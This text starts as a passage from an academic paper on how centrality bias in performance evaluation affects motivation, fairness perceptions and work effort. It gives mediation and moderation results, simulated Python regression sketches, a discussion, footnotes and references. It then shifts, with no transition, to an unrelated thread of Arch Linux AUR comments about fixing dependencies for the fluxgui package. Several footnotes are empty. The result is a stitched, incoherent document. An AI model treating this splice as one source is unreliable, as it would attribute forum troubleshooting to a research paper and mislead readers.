However, these findings are put into perspective when we illuminate above-average and below-average performers separately. According to Panel B of Table 6, BIAS is significantly and negatively related to AUT_MOT and CON_MOT for above-average performers (Rows 1 and 2). We also detect positive and significant coefficients for AUT_MOT and CON_MOT on OVERTIME. These findings are in line with H1, which refers to the mediating role of CON_MOT. Moreover, we find support for H2, which predicts that AUT_MOT negatively mediates the relationship between BIAS and OVERTIME for above-average performers. In contrast, there is no significant relationship between BIAS and AUT_MOT or between BIAS and CON_MOT for below-average performers (Panel C, Rows 1 and 2). BIAS is negatively associated with the two types of motivation for below-average performers; however, this relation is weaker than for above-average performers and not significant. Therefore, H1 is supported only partially, i.e. for above-average performers. However, the non-significant relationship between BIAS and AUT_MOT is in line with our reasoning related to RQ1, which suggests that the opposing effects of centrality bias on the psychological needs that determine autonomous motivation may result in a non-significant relationship between BIAS and AUT_MOT.
Row 3 of Panels B and C reveals some noteworthy findings regarding the mediating role of FAIRNESS. Whereas we do not find a significant relationship between BIAS and FAIRNESS for the full sample, we find that BIAS is negatively and significantly associated with FAIRNESS for above-average performers. This finding supports H3. Row 3 of Panel C implies a response to RQ2 as we find that for below-average performers, BIAS is highly significantly and positively related to FAIRNESS. Interestingly, we find that FAIRNESS is in turn positively and significantly associated with OVERTIME for above-average performers (Row 4 of Panel B). For below-average performers, however, this relationship is not significant (Row 4 of Panel C). These findings indicate that FAIRNESS is a partial mediator for above-average performers only. For below-average performers, our findings suggest that they perceive their inflated reward as fair. Yet, this fairness perception does not seem to “translate” into a higher willingness to exert work effort.
Table 7: Mediation analysis on the indirect effect of procedural fairness perceptions on autonomous motivation
4.4 The moderating effects of peer information
H4 and H5 predict that the associations of bias with autonomous motivation and with procedural fairness perceptions are moderated by the disclosure of peer information. These hypotheses thus suggest a two-way interaction between BIAS and PEER. To test these interactions, we constructed two models that were estimated with OLS regressions. The first one includes AUT_MOT as the dependent variable, whereas FAIRNESS is the dependent variable of the second model. In both cases, BIAS, PEER and the interaction term BIASxPEER are the primary variables of interest.
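Such a test amounts to an OLS model with an interaction term; the following sketch uses simulated data and the paper's variable names, not the actual observations:

import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(2)
n = 400
df = pd.DataFrame({
    "BIAS": rng.integers(0, 2, n),
    "PEER": rng.integers(0, 2, n),
})
# Simulated outcome in which peer information strengthens the negative effect of bias.
df["AUT_MOT"] = 4.0 - 0.6 * df["BIAS"] - 0.4 * df["BIAS"] * df["PEER"] + rng.normal(0, 1, n)

# "BIAS * PEER" expands to BIAS + PEER + BIAS:PEER; the interaction term carries the moderation test.
model = smf.ols("AUT_MOT ~ BIAS * PEER", data=df).fit()
print(model.params)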
Table 8: Moderation analysis on peer information
The regression results with regard to FAIRNESS are reported in Row 2 of Table 8. The two-way interaction of BIAS and PEER is not significantly related to FAIRNESS for the full sample (Panel A). The same conclusion holds for the separate analysis of above-average (Panel B) and below-average performers (Panel C). The coefficient for the interaction term of BIAS and PEER is positive for above-average performers. This finding suggests that the negative relationship between BIAS and FAIRNESS tends to be weaker when peer information is available. However, this finding is not significant. With regard to below-average performers, we find that the coefficient of BIASxPEER is negative. It indicates that the positive relationship between BIAS and FAIRNESS is weaker when peer information is disclosed, yet this effect is not significant. Taken together, we find no support for H5.
This analysis treats AUT_MOT and FAIRNESS as separate dependent variables. Since we found that the relationship between BIAS and AUT_MOT is fully mediated by FAIRNESS for above-average performers (see Table 7), we complement this analysis with a moderated mediation analysis including BIAS as the independent variable, FAIRNESS as the mediator, AUT_MOT as the dependent variable and PEER as the moderator. These untabulated findings do not change qualitatively, with the exception that the direct relationship between BIAS and AUT_MOT is no longer significant for the above-average performers since it is mediated by FAIRNESS. Therefore, the previously outlined conclusions remain unaffected.
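One way to implement such a moderated mediation is to bootstrap the conditional indirect effect of BIAS on AUT_MOT through FAIRNESS at each level of PEER; the sketch below relies on simulated data and is not a reproduction of the authors' untabulated PROCESS-style analysis:

import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(3)
n = 400
df = pd.DataFrame({"BIAS": rng.integers(0, 2, n), "PEER": rng.integers(0, 2, n)})
df["FAIRNESS"] = 4.0 - 1.0 * df["BIAS"] + 0.3 * df["BIAS"] * df["PEER"] + rng.normal(0, 1, n)
df["AUT_MOT"] = 3.0 + 0.6 * df["FAIRNESS"] + rng.normal(0, 1, n)

def conditional_indirect_effect(data, peer_level):
    # a-path: BIAS -> FAIRNESS, allowed to depend on PEER.
    a_model = smf.ols("FAIRNESS ~ BIAS * PEER", data=data).fit()
    # b-path: FAIRNESS -> AUT_MOT, controlling for BIAS, PEER and their interaction.
    b_model = smf.ols("AUT_MOT ~ FAIRNESS + BIAS * PEER", data=data).fit()
    a = a_model.params["BIAS"] + a_model.params["BIAS:PEER"] * peer_level
    return a * b_model.params["FAIRNESS"]

# Percentile bootstrap of the indirect effect when peer information is disclosed (PEER = 1).
boot = [conditional_indirect_effect(df.sample(len(df), replace=True, random_state=s), peer_level=1)
        for s in range(1000)]
print(np.percentile(boot, [2.5, 97.5]))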
5 Discussion
Given that firms frequently rely on performance measurement systems which incorporate subjectivity, a thorough understanding of the emergence and effects of bias arising out of subjective performance evaluations appears important. Our study contributes to corresponding research endeavours by focusing on the psychological mechanisms activated by centrality bias. Our main argument is that bias is likely to trigger several psychological mechanisms, comprising controlled and autonomous motivation as well as procedural fairness perceptions. The distinction of controlled and autonomous motivation as well as the consideration of fairness perceptions enable us to develop a more sophisticated understanding of the effects of centrality bias on the willingness to exert work effort. A closer examination of these psychological mechanisms appears particularly interesting for below-average performers who benefit from centrality bias as they are overvalued. Based on insights from the social psychology literature, we discussed potentially opposing effects of centrality bias for this group, resulting in an ambiguous net effect. For above-average performers, we expected that controlled and autonomous motivation as well as procedural fairness perceptions negatively mediate the relationship between centrality bias and the willingness to exert work effort. We tested our hypotheses and answered our research questions based on data collected during a vignette experiment.
Summary of findings for above-average performers
Our interpretation of this finding relies on referent cognitions theory and suggests that this negative relationship results from a comparison of the potential reward, which relies on an objective measure, with the subjectively adjusted reward. We argue that above-average performers are likely to consider the procedure for the determination of the potential reward based on the objective measure more valid, suggesting that the adjustment is considered unfair. From the perspectives of social comparison theory and equity theory, it appears surprising that the disclosure of peer information does not significantly moderate the associations of centrality bias with autonomous motivation and with procedural fairness perceptions. These findings suggest that the awareness of the “source” of the bias does not impact the psychological mechanisms triggered. With regard to autonomous motivation, a potential explanation is that the marginal effects of disclosing peer information on the feelings of relatedness and autonomy are negligible. Concerning procedural fairness, we suggest that fairness perceptions appear to depend more strongly on comparisons with the unadjusted objective measure than on comparisons with peers.
Summary of findings for below-average performers
Finally, we find that centrality bias is positively and significantly associated with procedural fairness perceptions. We argue that this relationship may be the outcome of a comparison between the reference and the actual evaluation. Interestingly, procedural fairness perceptions are not significantly associated with autonomous motivation for below-average performers. With regard to the moderating effect of peer information, we detect a significant moderating effect neither for the relationship between centrality bias and autonomous motivation nor for the relationship between centrality bias and procedural fairness perceptions. A potential explanation is that individuals do not pay considerable attention to comparisons with their peers when their own evaluation does not appear trustworthy anyway due to the deviation from the objective measure. This finding reinforces the previously outlined conclusion that the psychological mechanisms do not change if the subordinates are aware of the “source” of the bias.
Taken together, our paper advances our understanding of the psychological mechanisms activated by centrality bias by adopting a broader view that goes beyond an economic perspective. A number of implications arise out of these findings. First, we conclude that transparency due to the provision of peer information neither enhances the negative nor mitigates the positive effects of centrality bias. This finding appears particularly noteworthy in light of a recent study by Bol et al. (2016). They find that the simultaneous increase of information accuracy and outcome transparency may incentivize managers to provide less compressed ratings. In our setting, we regard the provision of peer information as an increase in outcome transparency. Taking the findings by Bol et al. (2016) and ours together, increasing outcome transparency may be an effective design feature of performance measurement systems that include subjectivity, as it may prevent the emergence of centrality bias but does not aggravate adverse effects if centrality bias occurs after all. Second, these findings complement previous research on relative performance evaluation and tournaments, which indicates that the disclosure of rankings increases the motivational effects on work effort (Luft 2016). Our findings suggest that this effect is not observable when outcome transparency unveils a centrality bias. This conclusion underlines that sensitivity (i.e., sufficient differentiation) in performance evaluation constitutes an important requisite for the motivational effects of peer information detected by prior research. Third, we find that fairness is the only psychological mechanism that is positively affected by centrality bias for below-average performers. Yet, we do not find that fairness is positively associated with the willingness to exert work effort in this context. In summary, we thus conclude that adopting a broader perspective that goes beyond predictions by economic theory reveals several simultaneously occurring psychological mechanisms, which in sum, however, do not necessarily result in an increasing willingness to exert work effort. Thus, we detect some asymmetry in the psychological mechanisms, as those that lead to adverse effects for above-average performers do not imply favourable effects on the part of below-average performers.
Our study is subject to a number of limitations. As outlined in the introduction, vignette experiments rely on constructed descriptions of hypothetical situations and capture intentions and attitudes of the participants with regard to these situations. Therefore, vignette experiments appear particularly applicable when researchers are interested in fairness perceptions or motivational processes (Liebe et al. 2017). Nevertheless, we acknowledge that the responses by the participants might be different if they had performed a real-effort task and thus would be more strongly “affected” by an overvaluation or undervaluation. While we cannot rule out this concern entirely, we argue that the high scores on traceability (mean = 5.22) suggest that the participants on average put themselves well into the work situation. Moreover, we expect that a stronger involvement and identification with the situation might have stronger psychological implications. Therefore, we expect that our analysis tends to underestimate rather than overestimate the psychological mechanisms. Moreover, we acknowledge that we potentially underestimate the influence of peer information as it may play a more pivotal role in real settings, in which employees have personal relationships with their peers.
In addition, the setting of the case and our manipulation of the variables imply a number of limitations. First, the context of the case is a consulting firm. We chose this context to provide a setting which the participants can easily understand. In those firms, however, interdependencies between subordinates tend to be stronger because the members of a project team collaborate closely. At the same time, the working environment tends to be highly competitive. It is possible that corresponding associations have affected the participants’ responses. Second, we manipulated performance at two extremes: Participants were either the team member with the lowest or the highest overtime hours. However, our findings might differ at intermediate levels of performance. More precisely, it is possible that the associations investigated would be less pronounced for individuals who provide non-extreme levels of performance. Third, we disclosed the ratio of bonus payments, but did not specify the individual amounts. A more differentiated manipulation could carry the risk that varying monetary preferences might confound the findings. Finally, we acknowledge that the manipulation of the independent variables strengthens causal claims; nevertheless, we rely on cross-sectional data only, whereas longitudinal data may provide further insights. Against this background, we hope that our study will encourage further research into the psychological mechanisms triggered by centrality bias and their implications for individual and organizational performance. Such research could also consider additional types of bias. In this regard, we put forward the enrichment of economic theory with insights from the social psychology literature to gather a deeper understanding of the behavioural implications of performance evaluation issues.
Footnotes
- 1.
In addition to subjective adjustments to objective performance measures, such as discretionary discounts or premiums by a superior (Cheng and Coyte 2014; Woods 2012), subjective performance evaluation may refer to assessments of specific performance dimensions, which cannot be measured objectively (i.e., work attitude or interpersonal skills), based on a superior’s personal impressions and opinions (Hartmann et al. 2010; Van der Stede et al. 2006). In line with prior research, this paper focuses on subjective adjustments to objectively measured performance for the determination of monetary rewards as this kind of subjectivity is frequently part of compensation contracts (Höppe and Moers 2011; Ederhof 2010).
- 2.
- 3.
- 4.
We assume that motivation as well as the fairness perceptions discussed in Sect. 2.4 are positively related to the willingness to exert work effort. Therefore, our hypotheses 1–3 imply a mediation. In other words, we predict that the relationship between centrality bias and effort is mediated by motivation and fairness perceptions, respectively. Given that prior research has accumulated a comprehensive body of literature indicating that motivation and fairness perceptions are positively related to effort and performance (Bonner and Sprinkle 2002; Colquitt et al. 2001), we focus on the psychological mechanisms activated by centrality bias and do not state the mediations explicitly.
- 5.
This assumption does not imply that performance evaluations and corresponding rewards are obsolete as individuals may not be sufficiently autonomously motivated to exert work effort. For this reason, we consider controlled and autonomous motivation as complements rather than substitutes.
- 6.
The feeling of relatedness does not only refer to the relationship between a subordinate and his superior, but may also affect the relationships among subordinates (Gagné and Deci 2005). We take the latter into consideration when we refer to the moderating role of peer information (see Sect. 2.5), which is likely to have an impact on the feeling of relatedness among subordinates.
- 7.
Note that peer information reveals the “source” of the bias to the subordinate. While the subordinate perceives “some bias” in the absence of peer information, the provision of peer information enables him to perceive centrality bias as such. Therefore, the hypotheses on peer information relate to what changes a subordinate’s perception of the bias. We are grateful to an anonymous reviewer for pointing this out.
- 8.
- 9.
- 10.
While the material was provided to the participants in German, this paper relies on a self-produced translation of the material.
- 11.
We did not perform a test on EXPOSURE, given that being an undergraduate or graduate student is the separation criterion for this variable.
References
- Adams JS (1965) Inequity in social exchange. Adv Exp Soc Psychol 2:267–299
- Aguinis H, Bradley KJ (2014) Best practice recommendations for designing and implementing experimental vignette methodology studies. Org Res Methods 17(4):351–371
- Ahn TS, Hwang I, Kim M-I (2010) The impact of performance measure discriminability on ratee incentives. Acc Rev 85(2):389–417
- Atzmüller C, Steiner PM (2010) Experimental vignette studies in survey research. Methodol Eur J Res Methods Behav Soc Sci 6(3):128–138
- Baker GP, Jensen MC, Murphy KJ (1988) Compensation and incentives: practice vs. theory. J Financ 43(3):593–616
- Baron RM, Kenny DA (1986) The moderator-mediator variable distinction in social psychological research: conceptual, strategic, and statistical considerations. J Pers Soc Psychol 51(6):1173–1182
- Berger J, Harbring C, Sliwka D (2013) Performance appraisals and the impact of forced distribution—an experimental investigation. Manage Sci 59(1):54–68
- Birnberg JG, Shields MD, Young SM (1990) The case for multiple methods in empirical management accounting research (with an illustration from budget setting). J Manage Acc Res 2:33–66
- Bol JC (2008) Subjectivity in compensation contracting. J Acc Lit 24:1–27
- Bol JC (2011) The determinants and performance effects of managers’ performance evaluation biases. Acc Rev 86(5):1549–1575
- Bol JC, Kramer S, Maas VS (2016) How control system design affects performance evaluation compression: the role of information accuracy and outcome transparency. Acc Organ Soc 51:64–73
- Bonner SE, Sprinkle GB (2002) The effects of monetary incentives on effort and task performance: theories, evidence, and a framework for research. Acc Organ Soc 27(4–5):303–345
- Breuer K, Nieken P, Sliwka D (2013) Social ties and subjective performance evaluations: an empirical investigation. Rev Manag Sci 7(2):141–157
- Burney LL, Henle C, Widener SK (2009) A path model examining the relations among strategic performance measurement system characteristics, organizational justice, and extra- and in-role performance. Acc Organ Soc 34(3–4):305–321
- Carrell MR, Dittrich JE (1978) Equity theory: the recent literature, methodological considerations, and new directions. Acad Manage Rev 3(2):202–210
- Chen Y-L (2014) Determinants of biased subjective performance evaluations: evidence from a Taiwanese public sector organization. Acc Bus Res 44(6):656–675
- Cheng MM, Coyte R (2014) The effects of incentive subjectivity and strategy communication on knowledge-sharing and extra-role behaviours. Manage Acc Res 25(2):119–130
- Colquitt JA et al (2001) Justice at the millennium: a meta-analytic review of 25 years of organizational justice research. J Appl Psychol 86(3):425–445
- Cropanzano R, Folger R (1989) Referent cognitions and task decision autonomy: beyond equity theory. J Appl Psychol 74(2):293–299
- Cugueró-Escofet N, Rosanas JM (2013) The just design and use of management control systems as requirements for goal congruence. Manage Acc Res 24(1):23–40
- Dai NT, Kuang XJ, Tang G (2018) Differential weighting of objective versus subjective measures in performance evaluation: experimental evidence. Eur Acc Rev 27(1):129–148
- Deci EL, Ryan RM (2000) The “what” and “why” of goal pursuits: human needs and the self-determination of behaviour. Psychol Inq 11(4):227–268
- Deci EL et al (2001) Need satisfaction, motivation, and well-being in the work organizations of a former Eastern bloc country: a cross-cultural study of self-determination. Pers Soc Psychol Bull 27(8):930–942
- Ederhof M (2010) Discretion in bonus plans. Acc Rev 85(6):1921–1949
- Eisenhardt KM (1989) Agency theory: an assessment and review. Acad Manage Rev 14(1):57–74
- Engellandt A, Riphahn RT (2011) Evidence on incentive effects of subjective performance evaluations. Ind Labor Relat Rev 64(2):241–257
- Franco-Santos M, Lucianetti L, Bourne M (2012) Contemporary performance measurement systems: a review of their consequences and a framework for research. Manage Acc Res 23(2):79–119
- Frederiksen A, Lange F, Kriechel B (2017) Subjective performance evaluations and employee careers. J Econ Behav Organ 134:408–429
- Gagné M, Deci EL (2005) Self-determination theory and work motivation. J Org Behav 26(4):331–362
- Gagné M, Forest J (2008) The study of compensation systems through the lens of self-determination theory: reconciling 35 years of debate. Can Psychol 49(3):225–232
- Gagné M et al (2010) The motivation at work scale: validation evidence in two languages. Educ Psychol Measur 70(4):628–646
- Gagné M et al (2015) The multidimensional work motivation scale: validation evidence in seven languages and nine countries. Eur J Work Org Psychol 24(2):178–196
- Gibbs M et al (2004) Determinants and effects of subjectivity in incentives. Acc Rev 79(2):409–436
- Goldman BM (2003) The application of referent cognitions theory to legal-claiming by terminated workers: the role of organizational justice and anger. J Manage 29(5):705–728
- Golman R, Bhatia S (2012) Performance evaluation inflation and compression. Acc Organ Soc 37(8):534–543
- Greenberg J, Ashton-James CE, Ashkanasy NM (2007) Social comparison processes in organizations. Organ Behav Hum Decis Process 102(1):22–41
- Hannan RL et al (2013) The effect of relative performance information on performance and effort allocation in a multi-task environment. Acc Rev 88(2):553–575
- Hartmann FGH, Slapničar S (2012a) Pay fairness and intrinsic motivation: the role of pay transparency. Int J Hum Resour Man 23(20):4283–4300
- Hartmann FGH, Slapničar S (2012b) The perceived fairness of performance evaluation: the role of uncertainty. Manage Acc Res 23(1):17–33
- Hartmann FGH, Naranjo-Gil D, Perego P (2010) The effects of leadership styles and use of performance measures on managerial work-related attitudes. Eur Acc Rev 19(2):275–310
- Hayes AF (2013) Introduction to mediation, moderation, and conditional process analysis: a regression-based approach. The Guilford Press, New York
- Hayes AF, Montoya AK, Rockwood NJ (2017) The analysis of mechanisms and their contingencies: PROCESS versus structural equation modeling. Australas Market J 25(1):76–81
- Höppe F, Moers F (2011) The choice of different types of subjectivity in CEO annual bonus contracts. Acc Rev 86(6):2023–2046
- Ittner CD, Larcker DF, Meyer MW (2003) Subjectivity and the weighting of performance measures: evidence from a balanced scorecard. Acc Rev 78(3):725–758
- Kampkötter P, Sliwka D (2016) The complementary use of experiments and field data to evaluate management practices: the case of subjective performance evaluations. J Inst Theor Econ 172(2):364–389
- Kampkötter P, Sliwka D (2017) More dispersion, higher bonuses? The role of differentiation in subjective performance evaluations. J Labor Econ (in press)
- Kunz J (2015) Objectivity and subjectivity in performance evaluation and autonomous motivation: an exploratory study. Manage Acc Res 27:27–46
- Kunz J, Linder S (2012) Organizational control and work effort – another look at the interplay of rewards and motivation. Eur Acc Rev 21(3):591–621
- Kunz AH, Pfaff D (2002) Agency theory, performance evaluation, and the hypothetical construct of intrinsic motivation. Acc Organ Soc 27(3):275–295
- Lau CM, Tan SLC (2006) The effects of procedural fairness and interpersonal trust on job tension in budgeting. Manage Acc Res 17(2):171–186
- Liebe U et al (2017) Using factorial survey experiments to measure attitudes, social norms, and fairness concerns in developing countries. Sociol Methods Res (in press)
- Linder S (2016) Fostering strategic renewal: monetary incentives, merit-based promotions, and engagement in autonomous strategic action. J Manag Control 27(2–3):251–280
- Luft J (2016) Cooperation and competition among employees: experimental evidence on the role of management control systems. Manage Acc Res 31:75–85
- McFarlin DB, Sweeney PD (1992) Distributive and procedural justice as predictors of satisfaction with personal and organizational outcomes. Acad Manage J 35(3):626–637
- Moers F (2005) Discretion and bias in performance evaluation: the impact of diversity and subjectivity. Acc Organ Soc 30(1):67–80
- Newman AH, Tafkov ID (2014) Relative performance information in tournaments with different prize structures. Acc Organ Soc 39(5):348–361
- Prendergast C (1999) The provision of incentives in firms. J Econ Lit 37(1):7–63
- Rajan MV, Reichelstein S (2006) Subjective performance indicators and discretionary bonus pools. J Acc Res 44(3):585–618
- Tafkov ID (2013) Private and public relative performance information under different compensation contracts. Acc Rev 88(1):327–350
- van den Bos K, van Prooijen J-W (2001) Referent cognitions theory: the role of closeness of reference points in the psychology of voice. J Pers Soc Psychol 81(4):616–626
- Van den Broeck A et al (2010) Capturing autonomy, competence, and relatedness of the work-related basic need satisfaction scale. J Occup Org Psychol 83(4):981–1002
- Van der Stede WA, Chow CW, Lin TW (2006) Strategy, choice of performance measures, and performance. Behav Res Acc 18:185–205
- Voußem L, Kramer S, Schäffer U (2016) Fairness perceptions of annual bonus payments: the effects of subjective performance measures and the achievement of bonus targets. Manage Acc Res 30:32–46
- Woods A (2012) Subjective adjustments to objective performance measures: the influence of prior performance. Acc Organ Soc 37(6):403–425
- Zapata-Phelan CP et al (2009) Procedural justice, interactional justice, and task performance: the mediating role of intrinsic motivation. Organ Behav Hum Decis Process 108(1):93
markzz commented on 2015-05-28 23:35
Found new location for the archive. Updated package to 1.1.8-11.
markzz commented on 2015-05-28 22:21
And do you know of another location to get the tar archive... If not, this is not repairable.
rawa commented on 2015-05-28 22:03
The URL is not working.
Returns:
No Such Resource
File not found.
fackamato commented on 2015-02-09 19:12
Yeah sorry my bad.
markzz commented on 2015-02-09 18:45
That seems like a problem with another package. Go to that package's page.
fackamato commented on 2015-02-09 18:43
error: 'libindicator-gtk3-*.pkg.tar.xz': could not find or read package
Edit libappindicator-gtk2 PKGBUILD with $EDITOR? [Y/n] n
==> Making package: libappindicator 12.10.0-4 (Mon 9 Feb 18:42:31 GMT 2015)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Missing dependencies:
-> libdbusmenu-gtk2
==> ERROR: Could not resolve all dependencies.
agus.aon commented on 2015-01-20 03:48
Hey, for anyone having trouble with some dependencies like lib32-libextx or something like that not found, you have to enable multilib repository on pacman by following this link:
cb474 commented on 2014-12-27 08:47
Yeah, the first thing I get when I install with yaourt is a request to replace libindicator with libindicator-gtk2.
I'm using the Mate desktop, is it okay to do this? Will it cause problems?
kaptoxic commented on 2014-12-19 13:01
For me, there are many conflicting files between libdbusmenu-glib and libdbusmenu-gtk2...
YAOMTC commented on 2014-12-05 05:55
As a KDE user, I found that redshift with this package works great:
vaikus commented on 2014-10-17 06:56
Having trouble starting fluxgui with the system. It kind of disappears from the XFCE panel after first setting it up and ticking the box so it would start with the system.
The .desktop file content looks like this:
[Desktop Entry]
Icon=fluxgui
Type=Application
Name=f.lux indicator applet
X-GNOME-Autostart-enabled=true
Exec=fluxgui
Hope it's solvable :)
markzz commented on 2014-10-08 04:00
Sorry for the delays (school and stuff), but I am still looking into it for desktops other than GNOME, like KDE (since I know it works with GNOME).
YAOMTC commented on 2014-10-05 23:21
Thanks! One more thing, after figuring out the gnome-settings-daemon.desktop issue I found that fluxgui still isn't autostarting. When I start KDE, I find /tmp/fluxgui_myname.pid exists again, which must mean it tried to start but failed. I'm guessing it's trying to start before gnome-settings-daemon can start, or finish starting?
markzz commented on 2014-10-05 22:57
gnome-settings-daemon is up to date in the 3.12 version. 3.14 will be released with the rest of GNOME 3.14. I am honestly a GNOME user (3.12) and have found that I have no issues. According to the issue on the git repository, it seems like something I can patch, so I'll get a test machine up to patch it and make the attempt to fix using your information. With the .desktop file, I'll add some information after the package is installed to fix that issue manually.
I suspect the reason the GNOME dependencies are there is because of the reason that this is based on the Ubuntu distribution and Unity was (or still is) based on gnome-shell.
YAOMTC commented on 2014-10-05 22:48
Scratch that, I can just run it as a regular user. My mistake. As for why it wasn't running in KDE: /etc/xdg/autostart/gnome-settings-daemon specifies "OnlyShowIn=GNOME;" so I commented that out.
As for why gnome-settings-daemon is required to be running for fluxgui, that's still a mystery to me.
YAOMTC commented on 2014-10-05 20:21
I should clarify, I'm using KDE for my desktop. I found out that if I use dconf-editor to uncheck org/gnome/settings-daemon/plugins/cursor/active, and use kdesu instead of sudo to start gnome-settings-daemon, the cursor remains visible.
YAOMTC commented on 2014-10-05 19:56
I found the problem, I think. Found this:
So I installed gnome-settings-daemon, but couldn't find a way to run it. So I looked through the files and found an executable in /usr/lib/gnome-settings-daemon so I ran it but now my cursor is invisible. Anyway I then deleted /tmp/fluxgui_myname.pid and ran fluxgui again, and now it's working, but my cursor is still invisible and gnome-settings-daemon is still out of date:
and didn't autostart.
YAOMTC commented on 2014-10-02 02:49
I do have that installed, yes.
markzz commented on 2014-10-01 10:43
I do not have that error when launching this. Tell me, is lib32-glib2 installed? If not, try it and if it solves your problem, I'll add it as a dependency.
YAOMTC commented on 2014-10-01 06:13
I'm getting that error too when I try to launch it:
falmp commented on 2014-09-22 10:38
Alright, nevermind then. I'm using Manjaro and their packages are usually a bit late. From this thread on Chakra's forum, it seems to be a problem that will be solved eventually:
hobarrera commented on 2014-09-22 10:32
$ pacman -Qo /usr/lib/libgio-2.0.la
error: failed to read file '/usr/lib/libgio-2.0.la': No such file or directory
None for me, and it builds fine on my system.
falmp commented on 2014-09-22 10:31
The error seems to be a missing /usr/lib/libgio-2.0.la. Which package provides that file on your system?
pacman -Qo /usr/lib/libgio-2.0.la
That file does not come with lib32-glib2:
falmp commented on 2014-09-22 10:21
Yes, I do:
$ pacman -Qs lib32-glib2
local/lib32-glib2 2.40.0-1
Common C routines used by GTK+ 2.4 and other libs (32-bit)
Firelight commented on 2014-09-22 08:48
falmp, do you have lib32-glib2? It won't build without it.
falmp commented on 2014-09-21 10:35
markzz, just wanted to clarify that today I took the time to set up a new archlinux box (using a Vagrant image) and fluxgui installed fine. So I don't know what's up with my day to day archlinux installation, but it's indeed all good with your package. Thank you.
falmp commented on 2014-09-19 11:31
Alright, but I am up to date (pacman -Suyy) and I do have base and base-devel installed. And I actually tried building it without packer:
The error is the same.
markzz commented on 2014-09-19 11:27
The link is the wiki's suggestions on what to do if a package won't build. They are good suggestions, and I would add trying to build it without packer.
It all builds fine with no errors on two computers.
falmp commented on 2014-09-19 11:08
markzz, not sure what you meant with the last link, but it seems to be an error with libappindicator. Can you confirm if it builds for you?
markzz commented on 2014-09-19 11:01
falmp commented on 2014-09-19 10:53
I guess there's still something off, but I think it's not fluxgui's fault. :(
markzz commented on 2014-09-19 10:46
Gotcha, updated PKGBUILD.
falmp commented on 2014-09-19 10:29
markzz, I still get this message:
Dependency `libappindicator' of `fluxgui' does not exist.
markzz commented on 2014-09-19 03:22
I have adopted and fixed it so that it will build and works on my computer. Please post if any more changes are needed.
falmp commented on 2014-09-17 09:35
Is it possible to disown this package so someone can adopt it and update it? Right now it's not building.
rgoulter commented on 2014-08-24 04:55
Indeed, replacing libindicator with libindicator-gtk2, and libdbusmenu with libdbusmenu-glib fixed this for me, and were the only changes I needed to make.
hobarrera commented on 2014-06-17 07:10
@cemegginson: You probably need one of these:
cemegginson commented on 2014-06-17 05:54
It seems that libindicator was removed from the AUR so you can't build this package anymore.
sveno commented on 2014-05-03 11:57
I got it working with the following changes:
* Changing libdbusmenu to libdbusmenu-glib
* Changing lines 161/162 in /usr/lib/python2.7/site-packages/fluxgui/fluxgui.py from
theme = gtk.gdk.screen_get_default().get_setting( 'gtk-icon-theme-name')
to
theme = gtk.settings_get_default().get_property('gtk-icon-theme-name')
KillaB commented on 2014-03-06 00:06
yeah libappindicator is an AUR package so makepkg won't be able to install it automatically
sysfu commented on 2014-03-01 21:50
KillaB's PKGBUILD worked for me after I manually installed the libappindicator dependency. thx KB
infinitestratas commented on 2014-02-28 08:00
@KillaB didn't work for me ):
KillaB commented on 2014-02-28 02:16
Here's a working PKGBUILD:
anderraso commented on 2014-02-13 21:05
Gives me this error:
error: destino no encontrado: libdbusmenu
sender commented on 2014-02-10 07:57
FYI: I never got this package to work. Competent alternative:
hobarrera commented on 2014-02-10 01:54
Does anyone have a working PKGBUILD for this? I deleted the missing depend, but it still won't work:
$
acgtyrant commented on 2013-12-11 05:43
Update the dependency please! Otherwise I may adopt it O_O
casimir commented on 2013-12-03 18:48
'libdbusmenu' doesn't need to appear as a dependency, since it's already a dependency of 'libdbusmenu-gtk2'.
Freso commented on 2013-10-26 17:51
libdbusmenu is now libdbusmenu-glib.
ffjia commented on 2013-09-14 02:43
@SZoPer - this is really annoying; why doesn't upstream fix that?
hobarrera commented on 2013-08-03 23:36
I know what this is; this package provides two binaries, and only one of them requires ALL the dependencies; hence, they should be optdepends.
t3ddy commented on 2013-05-28 17:23
This is fluxgui not x.flux :)
hobarrera commented on 2013-05-28 10:21
A lot of (most of) the dependencies should be optdepends, since they're only necessary for fluxgui (but not for xflux)
luolimao commented on 2013-04-27 06:55
Shouldn't you be talking to the maintainer of libdbusmenu?
dk0r commented on 2013-04-27 05:57
==> ERROR: A failure occurred in build().
Aborting...
==> ERROR: Makepkg was unable to build libdbusmenu.
==> Restart building libdbusmenu ? [y/N]
==> ------------------------------------
==>
luolimao commented on 2013-04-08 22:42
Can you change the build() to a package()? It won't work under pacman 4.1 otherwise.
SZoPer commented on 2013-03-09 01:32
If anyone's having the error below as well, try this old-but-still-valid advice:
$
t3ddy commented on 2012-12-14 09:38
Thanks!
However I recommend using redshift instead of f.lux ;)
kriation commented on 2012-12-14 01:09
I modified the PKGBUILD to depend on the packages below (in the order listed), and was successful in running fluxgui without the patch:
libindicator
libdbusmenu
libdbusmenu-gtk2
libappindicator
The packages above are in the AUR, and their dependencies are all handled through the Arch repositories.
The entire modified PKGBUILD is available here:
Anonymous comment on 2012-10-18 10:25
python-pexpect is now python2-pexpect
breed808 commented on 2012-09-09 11:10
Compiles and runs just fine. Thanks a lot!
donniezazen commented on 2012-08-28 06:17
pyxdg doesn't exist anymore.
t3ddy commented on 2011-01-31 15:33
I use redshift too :)
npouillard commented on 2011-01-31 15:03
In the mean time I've switched to redshift which is in the community repo, supports more screens with more colors...
t3ddy commented on 2011-01-31 10:50
updated according to silvik and npouillard suggestions
silvik commented on 2011-01-30 15:06
after installing this package I can't see the icon (only an X placeholder) - I'm on openbox if that matters.
after running gtk-update-icon-cache -q -t -f /usr/share/icons/hicolor and update-desktop-database -q it's ok.
I guess you need to include a fluxgui.install file that contains:
pkgname=fluxgui
post_install() {
gtk-update-icon-cache -q -t -f usr/share/icons/hicolor
update-desktop-database -q
}
post_upgrade() {
post_install
}
post_remove() {
post_install
}
npouillard commented on 2011-01-01 13:17
On x86_64 these packages are needed:
lib32-gcc-libs
lib32-glibc
lib32-libx11
lib32-libxau
lib32-libxcb
lib32-libxdmcp
lib32-libxext
lib32-libxxf86vm
alfplayer commented on 2010-12-13 23:10
Note: also includes the console version called "xflux".
hilton commented on 2010-11-19 18:30
Hello, please update this package to use python2-gconf from [extra]
instead of python-gconf which will be removed soon from AUR.
Cheers
t3ddy commented on 2010-11-02 10:27
